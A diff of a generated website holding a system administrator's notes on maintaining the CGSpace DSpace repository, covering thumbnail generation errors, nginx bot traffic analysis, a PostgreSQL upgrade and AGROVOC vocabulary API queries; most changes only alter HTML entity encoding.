<pre tabindex="0"><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
zsh: abort (core dumped) convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
$ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>I inspected the troublesome PDF using <a href="http://jhove.openpreservation.org/">jhove</a> and noticed that it is using <code>ISO PDF/A-1, Level B</code> and the other one doesn&rsquo;t list a profile, though I don&rsquo;t think this is relevant</li>
<li>I found another item that fails when generating a thumbnail (<a href="https://hdl.handle.net/10568/98391">10568/98391</a>, DSpace complains:</li>
</ul>
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -253,11 +253,11 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
at org.im4java.core.Info.getBaseInfo(Info.java:342)
... 14 more
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
@ -274,22 +274,22 @@ zsh: abort (core dumped) convert bnfb_biofortification\ Module_Participants\ Gu
</code></pre><ul>
<li>So far the only thing that stands out is that the two files that don&rsquo;t work were created with Microsoft Office 2016:</li>
</ul>
<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
</code></pre><ul>
<li>And the one that works was created with Office 365:</li>
</ul>
<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word for Office 365
Producer: Microsoft® Word for Office 365
</code></pre><ul>
<li>I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:</li>
</ul>
<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png=&#39;cover.png&#39;
$ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li>I&rsquo;ve tried a few times this week to register for the <a href="https://www.evisa.gov.et/">Ethiopian eVisa website</a>, but it is never successful</li>
@ -320,7 +320,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
<ul>
<li>Last night Linode sent a message that the load on CGSpace (linode18) was too high, here&rsquo;s a list of the top users at the time and throughout the day:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018:1(5|6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018:1(5|6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
225 40.77.167.142
226 66.249.64.63
232 46.101.86.248
@ -331,7 +331,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
962 66.249.70.27
1193 35.237.175.180
1450 2a01:4f8:140:3192::2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1141 207.46.13.57
1299 197.210.168.174
1341 54.70.40.11
@ -345,9 +345,9 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li><code>35.237.175.180</code> is known to us (CCAFS?), and I&rsquo;ve already added it to the list of bot IPs in nginx, which appears to be working:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03
4772
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
630
</code></pre><ul>
<li>I haven&rsquo;t seen <code>2a01:4f8:140:3192::2</code> before. Its user agent is some new bot:</li>
@ -356,9 +356,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12
</code></pre><ul>
<li>At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03
5111
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
419
</code></pre><ul>
<li><code>78.46.79.71</code> is another host on Hetzner with the following user agent:</li>
@ -368,9 +368,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2
<li>This is not the first time a host on Hetzner has used a &ldquo;normal&rdquo; user agent to make thousands of requests</li>
<li>At least it is re-using its Tomcat sessions somehow:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03
2044
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>In other news, it&rsquo;s good to see my re-work of the database connectivity in the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> actually caused a reduction of persistent database connections (from 1 to 0, but still!):</li>
@ -385,7 +385,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<li>Linode sent a message that the CPU usage of CGSpace (linode18) is too high last night</li>
<li>I looked in the logs and there&rsquo;s nothing particular going on:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1225 157.55.39.177
1240 207.46.13.12
1261 207.46.13.101
@ -403,9 +403,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
</code></pre><ul>
<li>But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05
6980
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05 | sort | uniq | wc -l
1156
</code></pre><ul>
<li><code>2a01:7e00::f03c:91ff:fe0a:d645</code> appears to be the CKM dev server where Danny is testing harvesting via Drupal</li>
@ -446,7 +446,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<li>Linode alerted me twice today that the load on CGSpace (linode18) was very high</li>
<li>Looking at the nginx logs I see a few new IPs in the top 10:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;17/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;17/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
927 157.55.39.81
975 54.70.40.11
2090 50.116.102.77
@ -505,7 +505,7 @@ $ ls -lh cgspace_2018-12-19.backup*
</code></pre><ul>
<li>Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p &#39;fuu&#39; -d
Connected to database.
Fixed 466 occurences of: Copyrighted; Any re-use allowed
</code></pre><ul>
@ -519,7 +519,7 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
# pg_dropcluster 9.6 main
# pg_upgradecluster 9.5 main
# pg_dropcluster 9.5 main
# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.5 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><ul>
<li>I&rsquo;ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments</li>
<li>Run all system updates on CGSpace (linode18) and restart the server</li>
@ -528,13 +528,13 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
<pre tabindex="0"><code>$ dspace cleanup -v
- Deleting bitstream information (ID: 158227)
- Deleting bitstream record from database (ID: 158227)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(158227) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(158227) is still referenced from table &#34;bundle&#34;.
...
</code></pre><ul>
<li>As always, the solution is to delete those IDs manually in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);&#39;
UPDATE 1
</code></pre><ul>
<li>After all that I started a full Discovery reindex to get the index name changes and rights updates</li>
@ -544,7 +544,7 @@ UPDATE 1
<li>CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat</li>
<li>The top IP addresses as of this evening are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
963 40.77.167.152
987 35.237.175.180
1062 40.77.167.55
@ -558,7 +558,7 @@ UPDATE 1
</code></pre><ul>
<li>And just around the time of the alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &quot;29/Dec/2018:1(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &#34;29/Dec/2018:1(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
115 66.249.66.223
118 207.46.13.14
123 34.218.226.147

View File

@ -12,7 +12,7 @@
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -38,7 +38,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -50,7 +50,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
357 207.46.13.1
903 54.70.40.11
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -141,7 +141,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -155,14 +155,14 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
</code></pre><ul>
<li>Analyzing the types of requests made by the top few IPs during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 54.70.40.11 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 54.70.40.11 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
30 bitstream
534 discover
352 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 207.46.13.1 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 207.46.13.1 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
194 bitstream
345 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 46.101.86.248 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 46.101.86.248 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
261 handle
</code></pre><ul>
<li>It&rsquo;s not clear to me what was causing the outbound traffic spike</li>
@ -283,7 +283,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
<ul>
<li>Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don&rsquo;t see anything around that time in the web server logs:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Jan/2019:1(7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Jan/2019:1(7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 207.46.13.192
217 31.6.77.23
340 66.249.70.29
@ -313,33 +313,33 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [
&#34;results&#34;: [
{
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;soil&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;soil&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_7156&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_7156&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
}
],
&quot;uri&quot;: &quot;&quot;
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>The API does not appear to be case sensitive (searches for <code>SOIL</code> and <code>soil</code> return the same thing)</li>
@ -359,23 +359,23 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [],
&quot;uri&quot;: &quot;&quot;
&#34;results&#34;: [],
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>I guess the <code>results</code> object will just be empty&hellip;</li>
@ -386,28 +386,28 @@ $ . /tmp/sparql/bin/activate
$ pip install sparql-client ipython
$ ipython
In [10]: import sparql
In [11]: s = sparql.Service(&quot;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&quot;, &quot;utf-8&quot;, &quot;GET&quot;)
In [12]: statement=('PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; '
...: 'SELECT '
...: '?label '
...: 'WHERE { '
...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } '
...: 'FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) . '
...: '} LIMIT 10')
In [11]: s = sparql.Service(&#34;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&#34;, &#34;utf-8&#34;, &#34;GET&#34;)
In [12]: statement=(&#39;PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; &#39;
...: &#39;SELECT &#39;
...: &#39;?label &#39;
...: &#39;WHERE { &#39;
...: &#39;{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } &#39;
...: &#39;FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) . &#39;
...: &#39;} LIMIT 10&#39;)
In [13]: result = s.query(statement)
In [14]: for row in result.fetchone():
...: print(row)
...:
